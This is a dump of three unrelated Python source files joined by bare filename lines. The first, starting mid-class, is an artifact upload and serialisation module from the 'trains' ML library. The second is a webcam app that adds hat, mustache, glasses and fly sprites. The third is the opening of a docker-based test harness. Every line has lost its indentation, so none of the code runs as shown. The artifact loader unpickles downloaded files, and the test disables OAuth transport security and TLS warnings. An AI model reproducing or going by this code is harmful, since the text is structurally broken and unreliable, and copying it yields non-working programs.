self._hash = artifact_api_object.hash
self._timestamp = datetime.fromtimestamp(artifact_api_object.timestamp)
self._metadata = dict(artifact_api_object.display_data) if artifact_api_object.display_data else {}
self._preview = artifact_api_object.type_data.preview if artifact_api_object.type_data else None
self._object = None
def get(self):
# type: () -> Any
"""
Return an object constructed from the artifact file
Currently supported types: Numpy.array, pandas.DataFrame, PIL.Image, dict (json)
All other types will return a pathlib2.Path object pointing to a local copy of the artifacts file (or directory)
:return: One of the following objects Numpy.array, pandas.DataFrame, PIL.Image, dict (json), or pathlib2.Path.
"""
if self._object:
return self._object
local_file = self.get_local_copy(raise_on_error=True)
# noinspection PyProtectedMember
if self.type == 'numpy' and np:
self._object = np.load(local_file)[self.name]
elif self.type in ('pandas', Artifacts._pd_artifact_type) and pd:
self._object = pd.read_csv(local_file)
elif self.type == 'image':
self._object = Image.open(local_file)
elif self.type == 'JSON':
with open(local_file, 'rt') as f:
self._object = json.load(f)
elif self.type == 'string':
with open(local_file, 'rt') as f:
self._object = f.read()
elif self.type == 'pickle':
with open(local_file, 'rb') as f:
self._object = pickle.load(f)
local_file = Path(local_file)
if self._object is None:
self._object = local_file
return self._object
def get_local_copy(self, extract_archive=True, raise_on_error=False):
# type: (bool, bool) -> str
"""
:param bool extract_archive: If True and artifact is of type 'archive' (compressed folder)
The returned path will be a temporary folder containing the archive content
:param bool raise_on_error: If True and the artifact could not be downloaded,
raise ValueError, otherwise return None on failure and output log warning.
:raise: Raises error if local copy not found.
:return: A local path to a downloaded copy of the artifact.
"""
from trains.storage import StorageManager
local_copy = StorageManager.get_local_copy(
remote_url=self.url,
extract_archive=extract_archive and self.type == 'archive',
name=self.name
)
if raise_on_error and local_copy is None:
raise ValueError(
"Could not retrieve a local copy of artifact {}, failed downloading {}".format(self.name, self.url))
return local_copy
def __repr__(self):
return str({'name': self.name, 'size': self.size, 'type': self.type, 'mode': self.mode, 'url': self.url,
'hash': self.hash, 'timestamp': self.timestamp,
'metadata': self.metadata, 'preview': self.preview, })
class Artifacts(object):
max_preview_size_bytes = 65536
_flush_frequency_sec = 300.
# notice these two should match
_save_format = '.csv.gz'
_compression = 'gzip'
# hashing constants
_hash_block_size = 65536
_pd_artifact_type = 'data-audit-table'
class _ProxyDictWrite(dict):
""" Dictionary wrapper that updates an arguments instance on any item set in the dictionary """
def __init__(self, artifacts_manager, *args, **kwargs):
super(Artifacts._ProxyDictWrite, self).__init__(*args, **kwargs)
self._artifacts_manager = artifacts_manager
# list of artifacts we should not upload (by name & weak-reference)
self.artifact_metadata = {}
# list of hash columns to calculate uniqueness for the artifacts
self.artifact_hash_columns = {}
def __setitem__(self, key, value):
# check that value is of type pandas
if pd and isinstance(value, pd.DataFrame):
super(Artifacts._ProxyDictWrite, self).__setitem__(key, value)
if self._artifacts_manager:
self._artifacts_manager.flush()
else:
raise ValueError('Artifacts currently support pandas.DataFrame objects only')
def unregister_artifact(self, name):
self.artifact_metadata.pop(name, None)
self.pop(name, None)
def add_metadata(self, name, metadata):
self.artifact_metadata[name] = deepcopy(metadata)
def get_metadata(self, name):
return self.artifact_metadata.get(name)
def add_hash_columns(self, artifact_name, hash_columns):
self.artifact_hash_columns[artifact_name] = hash_columns
def get_hash_columns(self, artifact_name):
return self.artifact_hash_columns.get(artifact_name)
@property
def registered_artifacts(self):
# type: () -> Dict[str, Artifact]
return self._artifacts_container
@property
def summary(self):
# type: () -> str
return self._summary
def __init__(self, task):
self._task = task
# notice the double link, this important since the Artifact
# dictionary needs to signal the Artifacts base on changes
self._artifacts_container = self._ProxyDictWrite(self)
self._last_artifacts_upload = {}
self._unregister_request = set()
self._thread = None
self._flush_event = Event()
self._exit_flag = False
self._summary = ''
self._temp_folder = []
self._task_artifact_list = []
self._task_edit_lock = RLock()
self._storage_prefix = None
def register_artifact(self, name, artifact, metadata=None, uniqueness_columns=True):
# type: (str, DataFrame, Optional[dict], Union[bool, Sequence[str]]) -> ()
"""
:param str name: name of the artifacts. Notice! it will override previous artifacts if name already exists.
:param pandas.DataFrame artifact: artifact object, supported artifacts object types: pandas.DataFrame
:param dict metadata: dictionary of key value to store with the artifact (visible in the UI)
:param list uniqueness_columns: list of columns for artifact uniqueness comparison criteria. The default value
is True, which equals to all the columns (same as artifact.columns).
"""
# currently we support pandas.DataFrame (which we will upload as csv.gz)
if name in self._artifacts_container:
LoggerRoot.get_base_logger().info('Register artifact, overwriting existing artifact \"{}\"'.format(name))
self._artifacts_container.add_hash_columns(
name, list(artifact.columns if uniqueness_columns is True else uniqueness_columns)
)
self._artifacts_container[name] = artifact
if metadata:
self._artifacts_container.add_metadata(name, metadata)
def unregister_artifact(self, name):
# type: (str) -> ()
# Remove artifact from the watch list
self._unregister_request.add(name)
self.flush()
def upload_artifact(self, name, artifact_object=None, metadata=None, preview=None,
delete_after_upload=False, auto_pickle=True):
# type: (str, Optional[object], Optional[dict], Optional[str], bool, bool) -> bool
if not Session.check_min_api_version('2.3'):
LoggerRoot.get_base_logger().warning('Artifacts not supported by your TRAINS-server version, '
'please upgrade to the latest server version')
return False
if name in self._artifacts_container:
raise ValueError("Artifact by the name of {} is already registered, use register_artifact".format(name))
# cast preview to string
if preview:
preview = str(preview)
# convert string to object if try is a file/folder (dont try to serialize long texts
if isinstance(artifact_object, six.string_types) and len(artifact_object) < 2048:
# noinspection PyBroadException
try:
artifact_path = Path(artifact_object)
if artifact_path.exists():
artifact_object = artifact_path
elif '*' in artifact_object or '?' in artifact_object:
# hackish, detect wildcard in tr files
folder = Path('').joinpath(*artifact_path.parts[:-1])
if folder.is_dir() and folder.parts:
wildcard = artifact_path.parts[-1]
if list(Path(folder).rglob(wildcard)):
artifact_object = artifact_path
except Exception:
pass
artifact_type_data = tasks.ArtifactTypeData()
artifact_type_data.preview = ''
override_filename_in_uri = None
override_filename_ext_in_uri = None
uri = None
if np and isinstance(artifact_object, np.ndarray):
artifact_type = 'numpy'
artifact_type_data.content_type = 'application/numpy'
artifact_type_data.preview = preview or str(artifact_object.__repr__())
override_filename_ext_in_uri = '.npz'
override_filename_in_uri = name + override_filename_ext_in_uri
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
np.savez_compressed(local_filename, **{name: artifact_object})
delete_after_upload = True
elif pd and isinstance(artifact_object, pd.DataFrame):
artifact_type = 'pandas'
artifact_type_data.content_type = 'text/csv'
artifact_type_data.preview = preview or str(artifact_object.__repr__())
override_filename_ext_in_uri = self._save_format
override_filename_in_uri = name
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
artifact_object.to_csv(local_filename, compression=self._compression)
delete_after_upload = True
elif isinstance(artifact_object, Image.Image):
artifact_type = 'image'
artifact_type_data.content_type = 'image/png'
desc = str(artifact_object.__repr__())
artifact_type_data.preview = preview or desc[1:desc.find(' at ')]
override_filename_ext_in_uri = '.png'
override_filename_in_uri = name + override_filename_ext_in_uri
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
artifact_object.save(local_filename)
delete_after_upload = True
elif isinstance(artifact_object, dict):
artifact_type = 'JSON'
artifact_type_data.content_type = 'application/json'
preview = preview or json.dumps(artifact_object, sort_keys=True, indent=4)
override_filename_ext_in_uri = '.json'
override_filename_in_uri = name + override_filename_ext_in_uri
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.write(fd, bytes(preview.encode()))
os.close(fd)
if len(preview) < self.max_preview_size_bytes:
artifact_type_data.preview = preview
else:
artifact_type_data.preview = '# full json too large to store, storing first {}kb\n{}'.format(
self.max_preview_size_bytes//1024, preview[:self.max_preview_size_bytes]
)
delete_after_upload = True
elif isinstance(artifact_object, (Path, pathlib_Path,) if pathlib_Path is not None else (Path,)):
# check if single file
artifact_object = Path(artifact_object)
artifact_object.expanduser().absolute()
# noinspection PyBroadException
try:
create_zip_file = not artifact_object.is_file()
except Exception: # Hack for windows pathlib2 bug, is_file isn't valid.
create_zip_file = True
else: # We assume that this is not Windows os
if artifact_object.is_dir():
# change to wildcard
artifact_object /= '*'
if create_zip_file:
folder = Path('').joinpath(*artifact_object.parts[:-1])
if not folder.is_dir() or not folder.parts:
raise ValueError("Artifact file/folder '{}' could not be found".format(
artifact_object.as_posix()))
wildcard = artifact_object.parts[-1]
files = list(Path(folder).rglob(wildcard))
override_filename_ext_in_uri = '.zip'
override_filename_in_uri = folder.parts[-1] + override_filename_ext_in_uri
fd, zip_file = mkstemp(
prefix=quote(folder.parts[-1], safe="") + '.', suffix=override_filename_ext_in_uri
)
try:
artifact_type_data.content_type = 'application/zip'
archive_preview = 'Archive content {}:\n'.format(artifact_object.as_posix())
with ZipFile(zip_file, 'w', allowZip64=True, compression=ZIP_DEFLATED) as zf:
for filename in sorted(files):
if filename.is_file():
relative_file_name = filename.relative_to(folder).as_posix()
archive_preview += '{} - {}\n'.format(
relative_file_name, humanfriendly.format_size(filename.stat().st_size))
zf.write(filename.as_posix(), arcname=relative_file_name)
except Exception as e:
# failed uploading folder:
LoggerRoot.get_base_logger().warning('Exception {}\nFailed zipping artifact folder {}'.format(
folder, e))
return False
finally:
os.close(fd)
artifact_type_data.preview = preview or archive_preview
artifact_object = zip_file
artifact_type = 'archive'
artifact_type_data.content_type = mimetypes.guess_type(artifact_object)[0]
local_filename = artifact_object
delete_after_upload = True
else:
if not artifact_object.is_file():
raise ValueError("Artifact file '{}' could not be found".format(artifact_object.as_posix()))
override_filename_in_uri = artifact_object.parts[-1]
artifact_type_data.preview = preview or '{} - {}\n'.format(
artifact_object, humanfriendly.format_size(artifact_object.stat().st_size))
artifact_object = artifact_object.as_posix()
artifact_type = 'custom'
artifact_type_data.content_type = mimetypes.guess_type(artifact_object)[0]
local_filename = artifact_object
elif (
isinstance(artifact_object, six.string_types) and len(artifact_object) < 4096
and urlparse(artifact_object).scheme in remote_driver_schemes
):
# we should not upload this, just register
local_filename = None
uri = artifact_object
artifact_type = 'custom'
artifact_type_data.content_type = mimetypes.guess_type(artifact_object)[0]
elif isinstance(artifact_object, six.string_types):
# if we got here, we should store it as text file.
artifact_type = 'string'
artifact_type_data.content_type = 'text/plain'
if preview:
artifact_type_data.preview = preview
elif len(artifact_object) < self.max_preview_size_bytes:
artifact_type_data.preview = artifact_object
else:
artifact_type_data.preview = '# full text too large to store, storing first {}kb\n{}'.format(
self.max_preview_size_bytes//1024, artifact_object[:self.max_preview_size_bytes]
)
delete_after_upload = True
override_filename_ext_in_uri = '.txt'
override_filename_in_uri = name + override_filename_ext_in_uri
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
# noinspection PyBroadException
try:
with open(local_filename, 'wt') as f:
f.write(artifact_object)
except Exception:
# cleanup and raise exception
os.unlink(local_filename)
raise
elif auto_pickle:
# if we are here it means we do not know what to do with the object, so we serialize it with pickle.
artifact_type = 'pickle'
artifact_type_data.content_type = 'application/pickle'
# noinspection PyBroadException
try:
artifact_type_data.preview = preview or str(artifact_object.__repr__())[:self.max_preview_size_bytes]
except Exception:
artifact_type_data.preview = preview or ''
delete_after_upload = True
override_filename_ext_in_uri = '.pkl'
override_filename_in_uri = name + override_filename_ext_in_uri
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
# noinspection PyBroadException
try:
with open(local_filename, 'wb') as f:
pickle.dump(artifact_object, f)
except Exception:
# cleanup and raise exception
os.unlink(local_filename)
raise
else:
raise ValueError("Artifact type {} not supported".format(type(artifact_object)))
# remove from existing list, if exists
for artifact in self._task_artifact_list:
if artifact.key == name:
if artifact.type == self._pd_artifact_type:
raise ValueError("Artifact of name {} already registered, "
"use register_artifact instead".format(name))
self._task_artifact_list.remove(artifact)
break
if not local_filename:
file_size = None
file_hash = None
else:
# check that the file to upload exists
local_filename = Path(local_filename).absolute()
if not local_filename.exists() or not local_filename.is_file():
LoggerRoot.get_base_logger().warning('Artifact upload failed, cannot find file {}'.format(
local_filename.as_posix()))
return False
file_hash, _ = self.sha256sum(local_filename.as_posix())
file_size = local_filename.stat().st_size
uri = self._upload_local_file(local_filename, name,
delete_after_upload=delete_after_upload,
override_filename=override_filename_in_uri,
override_filename_ext=override_filename_ext_in_uri)
timestamp = int(time())
artifact = tasks.Artifact(key=name, type=artifact_type,
uri=uri,
content_size=file_size,
hash=file_hash,
timestamp=timestamp,
type_data=artifact_type_data,
display_data=[(str(k), str(v)) for k, v in metadata.items()] if metadata else None)
# update task artifacts
with self._task_edit_lock:
self._task_artifact_list.append(artifact)
self._task.set_artifacts(self._task_artifact_list)
return True
def flush(self):
# type: () -> ()
# start the thread if it hasn't already:
self._start()
# flush the current state of all artifacts
self._flush_event.set()
def stop(self, wait=True):
# type: (bool) -> ()
# stop the daemon thread and quit
# wait until thread exists
self._exit_flag = True
self._flush_event.set()
if wait:
if self._thread:
self._thread.join()
# remove all temp folders
for f in self._temp_folder:
# noinspection PyBroadException
try:
Path(f).rmdir()
except Exception:
pass
def _start(self):
# type: () -> ()
""" Start daemon thread if any artifacts are registered and thread is not up yet """
if not self._thread and self._artifacts_container:
# start the daemon thread
self._flush_event.clear()
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
def _daemon(self):
# type: () -> ()
while not self._exit_flag:
self._flush_event.wait(self._flush_frequency_sec)
self._flush_event.clear()
artifact_keys = list(self._artifacts_container.keys())
for name in artifact_keys:
try:
self._upload_data_audit_artifacts(name)
except Exception as e:
LoggerRoot.get_base_logger().warning(str(e))
# create summary
self._summary = self._get_statistics()
def _upload_data_audit_artifacts(self, name):
# type: (str) -> ()
logger = self._task.get_logger()
pd_artifact = self._artifacts_container.get(name)
pd_metadata = self._artifacts_container.get_metadata(name)
# remove from artifacts watch list
if name in self._unregister_request:
try:
self._unregister_request.remove(name)
except KeyError:
pass
self._artifacts_container.unregister_artifact(name)
if pd_artifact is None:
return
override_filename_ext_in_uri = self._save_format
override_filename_in_uri = name
fd, local_csv = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
local_csv = Path(local_csv)
pd_artifact.to_csv(local_csv.as_posix(), index=False, compression=self._compression)
current_sha2, file_sha2 = self.sha256sum(local_csv.as_posix(), skip_header=32)
if name in self._last_artifacts_upload:
previous_sha2 = self._last_artifacts_upload[name]
if previous_sha2 == current_sha2:
# nothing to do, we can skip the upload
# noinspection PyBroadException
try:
local_csv.unlink()
except Exception:
pass
return
self._last_artifacts_upload[name] = current_sha2
# If old trains-server, upload as debug image
if not Session.check_min_api_version('2.3'):
logger.report_image(title='artifacts', series=name, local_path=local_csv.as_posix(),
delete_after_upload=True, iteration=self._task.get_last_iteration(),
max_image_history=2)
return
# Find our artifact
artifact = None
for an_artifact in self._task_artifact_list:
if an_artifact.key == name:
artifact = an_artifact
break
file_size = local_csv.stat().st_size
# upload file
uri = self._upload_local_file(local_csv, name, delete_after_upload=True,
override_filename=override_filename_in_uri,
override_filename_ext=override_filename_ext_in_uri)
# update task artifacts
with self._task_edit_lock:
if not artifact:
artifact = tasks.Artifact(key=name, type=self._pd_artifact_type)
self._task_artifact_list.append(artifact)
artifact_type_data = tasks.ArtifactTypeData()
artifact_type_data.data_hash = current_sha2
artifact_type_data.content_type = "text/csv"
artifact_type_data.preview = str(pd_artifact.__repr__(
)) + '\n\n' + self._get_statistics({name: pd_artifact})
artifact.type_data = artifact_type_data
artifact.uri = uri
artifact.content_size = file_size
artifact.hash = file_sha2
artifact.timestamp = int(time())
artifact.display_data = [(str(k), str(v)) for k, v in pd_metadata.items()] if pd_metadata else None
self._task.set_artifacts(self._task_artifact_list)
def _upload_local_file(
self, local_file, name, delete_after_upload=False, override_filename=None, override_filename_ext=None
):
# type: (str, str, bool, Optional[str], Optional[str]) -> str
"""
Upload local file and return uri of the uploaded file (uploading in the background)
"""
upload_uri = self._task.output_uri or self._task.get_logger().get_default_upload_destination()
if not isinstance(local_file, Path):
local_file = Path(local_file)
ev = UploadEvent(metric='artifacts', variant=name,
image_data=None, upload_uri=upload_uri,
local_image_path=local_file.as_posix(),
delete_after_upload=delete_after_upload,
override_filename=override_filename,
override_filename_ext=override_filename_ext,
override_storage_key_prefix=self._get_storage_uri_prefix())
_, uri = ev.get_target_full_upload_uri(upload_uri)
# send for upload
# noinspection PyProtectedMember
self._task.reporter._report(ev)
return uri
def _get_statistics(self, artifacts_dict=None):
# type: (Optional[Dict[str, Artifact]]) -> str
summary = ''
artifacts_dict = artifacts_dict or self._artifacts_container
thread_pool = ThreadPool()
try:
# build hash row sets
artifacts_summary = []
for a_name, a_df in artifacts_dict.items():
hash_cols = self._artifacts_container.get_hash_columns(a_name)
if not pd or not isinstance(a_df, pd.DataFrame):
continue
if hash_cols is True:
hash_col_drop = []
else:
hash_cols = set(hash_cols)
missing_cols = hash_cols.difference(a_df.columns)
if missing_cols == hash_cols:
LoggerRoot.get_base_logger().warning(
'Uniqueness columns {} not found in artifact {}. '
'Skipping uniqueness check for artifact.'.format(list(missing_cols), a_name)
)
continue
elif missing_cols:
# missing_cols must be a subset of hash_cols
hash_cols.difference_update(missing_cols)
LoggerRoot.get_base_logger().warning(
'Uniqueness columns {} not found in artifact {}. Using {}.'.format(
list(missing_cols), a_name, list(hash_cols)
)
)
hash_col_drop = [col for col in a_df.columns if col not in hash_cols]
a_unique_hash = set()
def hash_row(r):
a_unique_hash.add(hash(bytes(r)))
a_shape = a_df.shape
# parallelize
a_hash_cols = a_df.drop(columns=hash_col_drop)
thread_pool.map(hash_row, a_hash_cols.values)
# add result
artifacts_summary.append((a_name, a_shape, a_unique_hash,))
# build intersection summary
for i, (name, shape, unique_hash) in enumerate(artifacts_summary):
summary += '[{name}]: shape={shape}, {unique} unique rows, {percentage:.1f}% uniqueness\n'.format(
name=name, shape=shape, unique=len(unique_hash),
percentage=100 * len(unique_hash) / float(shape[0]))
for name2, shape2, unique_hash2 in artifacts_summary[i + 1:]:
intersection = len(unique_hash & unique_hash2)
summary += '\tIntersection with [{name2}] {intersection} rows: {percentage:.1f}%\n'.format(
name2=name2, intersection=intersection,
percentage=100 * intersection / float(len(unique_hash2)))
except Exception as e:
LoggerRoot.get_base_logger().warning(str(e))
finally:
thread_pool.close()
thread_pool.terminate()
return summary
def _get_temp_folder(self, force_new=False):
# type: (bool) -> str
if force_new or not self._temp_folder:
new_temp = mkdtemp(prefix='artifacts_')
self._temp_folder.append(new_temp)
return new_temp
return self._temp_folder[0]
def _get_storage_uri_prefix(self):
# type: () -> str
if not self._storage_prefix:
# noinspection PyProtectedMember
self._storage_prefix = self._task._get_output_destination_suffix()
return self._storage_prefix
@staticmethod
def sha256sum(filename, skip_header=0):
# type: (str, int) -> (Optional[str], Optional[str])
# create sha2 of the file, notice we skip the header of the file (32 bytes)
# because sometimes that is the only change
h = hashlib.sha256()
file_hash = hashlib.sha256()
b = bytearray(Artifacts._hash_block_size)
mv = memoryview(b)
try:
with open(filename, 'rb', buffering=0) as f:
# skip header
if skip_header:
file_hash.update(f.read(skip_header))
# noinspection PyUnresolvedReferences
for n in iter(lambda: f.readinto(mv), 0):
h.update(mv[:n])
if skip_header:
file_hash.update(mv[:n])
except Exception as e:
LoggerRoot.get_base_logger().warning(str(e))
return None, None
return h.hexdigest(), file_hash.hexdigest() if skip_header else None
|
main.py
|
from __future__ import absolute_import, print_function
import argparse
import os
import sys
import threading
import time
from os import listdir
from os.path import isfile, join
from sys import platform as _platform
from threading import Thread
import cv2
import pyfakewebcam
from PIL import Image, ImageTk
if sys.version_info.major >= 3:
from tkinter import SUNKEN, RAISED, Tk, PhotoImage, Button, Label
else:
from tkinter import SUNKEN, RAISED, Tk, PhotoImage, Button, Label
_streaming = False
if _platform == "linux" or _platform == "linux2":
try:
import pyfakewebcam
_streaming = True
except ImportError:
print("Could not import pyfakewebcam")
### Function to set wich sprite must be drawn
def put_sprite(num):
global SPRITES, BTNS
SPRITES[num] = 1 - SPRITES[num] # not actual value
if SPRITES[num]:
BTNS[num].config(relief=SUNKEN)
else:
BTNS[num].config(relief=RAISED)
# Draws sprite over a image
# It uses the alpha chanel to see which pixels need to be reeplaced
# Input: image, sprite: numpy arrays
# output: resulting merged image
def draw_sprite(frame, sprite, x_offset, y_offset):
(h, w) = (sprite.shape[0], sprite.shape[1])
(imgH, imgW) = (frame.shape[0], frame.shape[1])
if y_offset + h >= imgH: # if sprite gets out of image in the bottom
sprite = sprite[0 : imgH - y_offset, :, :]
if x_offset + w >= imgW: # if sprite gets out of image to the right
sprite = sprite[:, 0 : imgW - x_offset, :]
if x_offset < 0: # if sprite gets out of image to the left
sprite = sprite[:, abs(x_offset) : :, :]
w = sprite.shape[1]
x_offset = 0
# for each RGB chanel
for c in range(3):
# chanel 4 is alpha: 255 is not transpartne, 0 is transparent background
frame[y_offset : y_offset + h, x_offset : x_offset + w, c] = sprite[:, :, c] * (
sprite[:, :, 3] / 255.0
) + frame[y_offset : y_offset + h, x_offset : x_offset + w, c] * (
1.0 - sprite[:, :, 3] / 255.0
)
return frame
# Returns the rectangles
# Img is a BGR image
# haar_cascade is a cv2.CascadeClassifier object
# the other inputs are the filter parameters
def apply_Haar_filter(img, haar_cascade, scaleFact=1.1, minNeigh=5, minSizeW=30):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
features = haar_cascade.detectMultiScale(
gray,
scaleFactor=scaleFact,
minNeighbors=minNeigh,
minSize=(minSizeW, minSizeW),
flags=cv2.CASCADE_SCALE_IMAGE,
)
return features
# Adjust the given sprite to the head's width and position
# in case of the sprite not fitting the screen in the top, the sprite should be trimed
def adjust_sprite2head(sprite, head_width, head_ypos):
(h_sprite, w_sprite) = (sprite.shape[0], sprite.shape[1])
factor = 1.0 * head_width / w_sprite
sprite = cv2.resize(
sprite, (0, 0), fx=factor, fy=factor
) # adjust to have the same width as head
(h_sprite, w_sprite) = (sprite.shape[0], sprite.shape[1])
y_orig = (
head_ypos - h_sprite
) # adjust the position of sprite to end where the head begins
if (
y_orig < 0
): # check if the head is not to close to the top of the image and the sprite would not fit in the screen
sprite = sprite[abs(y_orig) : :, :, :] # in that case, we cut the sprite
y_orig = 0 # the sprite then begins at the top of the image
return (sprite, y_orig)
def apply_sprite(image, path2sprite, w, x, y):
sprite = cv2.imread(path2sprite, -1)
(sprite, y_final) = adjust_sprite2head(sprite, w, y)
image = draw_sprite(image, sprite, x, y_final)
def apply_sprite2feature(
image,
sprite_path,
haar_filter,
x_offset,
y_offset,
y_offset_image,
adjust2feature,
desired_width,
x,
y,
w,
h,
):
sprite = cv2.imread(sprite_path, -1)
(h_sprite, w_sprite) = (sprite.shape[0], sprite.shape[1])
xpos = x + x_offset
ypos = y + y_offset
factor = 1.0 * desired_width / w_sprite
sub_img = image[y + int(y_offset_image) : y + h, x : x + w, :]
feature = apply_Haar_filter(sub_img, haar_filter, 1.3, 10, 10)
if len(feature) != 0:
xpos, ypos = x, y + feature[0, 1] # adjust only to feature in y axis (eyes)
if adjust2feature:
size_mustache = 1.2 # how many times bigger than mouth
factor = 1.0 * (feature[0, 2] * size_mustache) / w_sprite
xpos = (
x + feature[0, 0] - int(feature[0, 2] * (size_mustache - 1) / 2)
) # centered respect to width
ypos = (
y + y_offset_image + feature[0, 1] - int(h_sprite * factor)
) # right on top
sprite = cv2.resize(sprite, (0, 0), fx=factor, fy=factor)
image = draw_sprite(image, sprite, int(xpos), int(ypos))
# Principal Loop where openCV (magic) ocurs
def cvloop(run_event, read_camera=0, virtual_camera=0):
global panelA
global SPRITES
dir_ = "./sprites/flyes/"
flies = [
f for f in listdir(dir_) if isfile(join(dir_, f))
] # image of flies to make the "animation"
i = 0
video_capture = cv2.VideoCapture(read_camera) # read from webcam
(x, y, w, h) = (0, 0, 10, 10) # whatever initial values
# Filters path
haar_faces = cv2.CascadeClassifier("./filters/haarcascade_frontalface_default.xml")
haar_eyes = cv2.CascadeClassifier("./filters/haarcascade_eye.xml")
haar_mouth = cv2.CascadeClassifier("./filters/Mouth.xml")
haar_nose = cv2.CascadeClassifier("./filters/Nose.xml")
stream_camera = None
while run_event.is_set(): # while the thread is active we loop
ret, image = video_capture.read()
if not ret:
print("Error reading camera, exiting")
break
if _streaming:
if stream_camera is None:
if virtual_camera:
h, w = image.shape[:2]
stream_camera = pyfakewebcam.FakeWebcam(
"/dev/video{}".format(virtual_camera), w, h
)
faces = apply_Haar_filter(image, haar_faces, 1.3, 5, 30)
for (x, y, w, h) in faces: # if there are faces
# take first face found (x,y,w,h) = (faces[0,0],faces[0,1],faces[0,2],faces[0,3])
# hat condition
if SPRITES[0]:
apply_sprite(image, "./sprites/hat.png", w, x, y)
# mustache condition
if SPRITES[1]:
# empirically mouth is at 2/3 of the face from the top
# empirically the width of mustache is have of face's width (offset of w/4)
# we look for mouths only from the half of the face (to avoid false positives)
apply_sprite2feature(
image,
"./sprites/mustache.png",
haar_mouth,
w / 4,
2 * h / 3,
h / 2,
True,
w / 2,
x,
y,
w,
h,
)
# glasses condition
if SPRITES[3]:
# empirically eyes are at 1/3 of the face from the top
apply_sprite2feature(
image,
"./sprites/glasses.png",
haar_eyes,
0,
h / 3,
0,
False,
w,
x,
y,
w,
h,
)
# flies condition
if SPRITES[2]:
# to make the "animation" we read each time a different image of that folder
# the images are placed in the correct order to give the animation impresion
apply_sprite(image, dir_ + flies[i], w, x, y)
i += 1
i = (
0 if i >= len(flies) else i
) # when done with all images of that folder, begin again
# OpenCV represents image as BGR; PIL but RGB, we need to change the chanel order
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if _streaming:
if virtual_camera:
stream_camera.schedule_frame(image)
# conerts to PIL format
image = Image.fromarray(image)
# Converts to a TK format to visualize it in the GUI
image = ImageTk.PhotoImage(image)
# Actualize the image in the panel to show it
panelA.configure(image=image)
panelA.image = image
video_capture.release()
# Parser
parser = argparse.ArgumentParser()
parser.add_argument("--read_camera", type=int, default=0, help="Id to read camera from")
parser.add_argument(
"--virtual_camera",
type=int,
default=0,
help="If different from 0, creates a virtual camera with results on that id (linux only)",
)
args = parser.parse_args()
# Initialize GUI object
root = Tk()
root.title("Snap chat filters")
this_dir = os.path.dirname(os.path.realpath(__file__))
# Adds a custom logo
imgicon = PhotoImage(file=os.path.join(this_dir, "imgs", "icon.gif"))
root.tk.call("wm", "iconphoto", root._w, imgicon)
##Create 3 buttons and assign their corresponding function to active sprites
btn1 = Button(root, text="Hat", command=lambda: put_sprite(0))
btn1.pack(side="top", fill="both", expand="no", padx="10", pady="10")
btn2 = Button(root, text="Mustache", command=lambda: put_sprite(1))
btn2.pack(side="top", fill="both", expand="no", padx="10", pady="10")
btn3 = Button(root, text="Flies", command=lambda: put_sprite(2))
btn3.pack(side="top", fill="both", expand="no", padx="10", pady="10")
btn4 = Button(root, text="Glasses", command=lambda: put_sprite(3))
btn4.pack(side="top", fill="both", expand="no", padx="10", pady="10")
# Create the panel where webcam image will be shown
panelA = Label(root)
panelA.pack(padx=10, pady=10)
# Variable to control which sprite you want to visualize
SPRITES = [
0,
0,
0,
0,
] # hat, mustache, flies, glasses -> 1 is visible, 0 is not visible
BTNS = [btn1, btn2, btn3, btn4]
# Creates a thread where the magic ocurs
run_event = threading.Event()
run_event.set()
action = Thread(target=cvloop, args=(run_event, args.read_camera, args.virtual_camera))
action.setDaemon(True)
action.start()
# Function to close all properly, aka threads and GUI
def terminate():
global root, run_event, action
print("Closing thread opencv...")
run_event.clear()
time.sleep(1)
# action.join() # strangely in Linux this thread does not terminate properly, so .join never finishes
root.destroy()
print("All closed! Chao")
# When the GUI is closed it actives the terminate function
root.protocol("WM_DELETE_WINDOW", terminate)
root.mainloop() # creates loop of GUI
|
test.py
|
#!/usr/bin/env python
# coding: utf-8
from __future__ import print_function
from traceback import format_exc, print_stack
from re import compile as re_compile, IGNORECASE as re_IGNORECASE, sub as re_sub
from os import path as os_path, getuid as os_getuid, urandom as os_urandom, remove as os_remove, makedirs as os_makedirs, environ
from docker import Client
from json import loads as json_loads, dumps as json_dumps
from time import sleep, time
from urlparse import urlparse, parse_qs
from SimpleHTTPServer import SimpleHTTPRequestHandler
from threading import Thread
from binascii import hexlify as binascii_hexlify
from logging.handlers import RotatingFileHandler
from logging import getLogger, StreamHandler, Formatter, Filter, DEBUG, ERROR, INFO, WARN, CRITICAL
from copy import deepcopy
from urllib import urlencode
import requests
import docker
import socket
import sys
import BaseHTTPServer
import httplib
import logging
logger = getLogger("micatest")
logger.setLevel(level=DEBUG)
streamhandler = StreamHandler(sys.stderr)
logger.addHandler(streamhandler)
def tlog(*objs):
logger.debug(*objs)
environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
start_time = int(time())
level = logging.WARN
'''
httplib.HTTPConnection.debuglevel = 2
'''
logging.basicConfig()
logging.getLogger().setLevel(level)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(DEBUG)
requests_log.propagate = False
requests_oauth_log = logging.getLogger("requests_oauthlib.oauth2_session")
requests_oauth_log.setLevel(WARN)
requests_oauth_log.propagate = False
requests.packages.urllib3.disable_warnings()
cwd = re_compile(".*\/").search(os_path.realpath(__file__)).group(0)
sys.path = [cwd, cwd + "../"] + sys.path
record = open(cwd + "../logs/test.log", 'w')
from params import parameters, test
from common import sdict, recursiveSetInDict, timest, getFromDict
from mica import go
from pyquery import PyQuery as pq
from sys import argv
import couch_adapter
server_port = 9888
target = test["target_proto"] + "://" + test["target"] + ":" + str(test["target_port"])
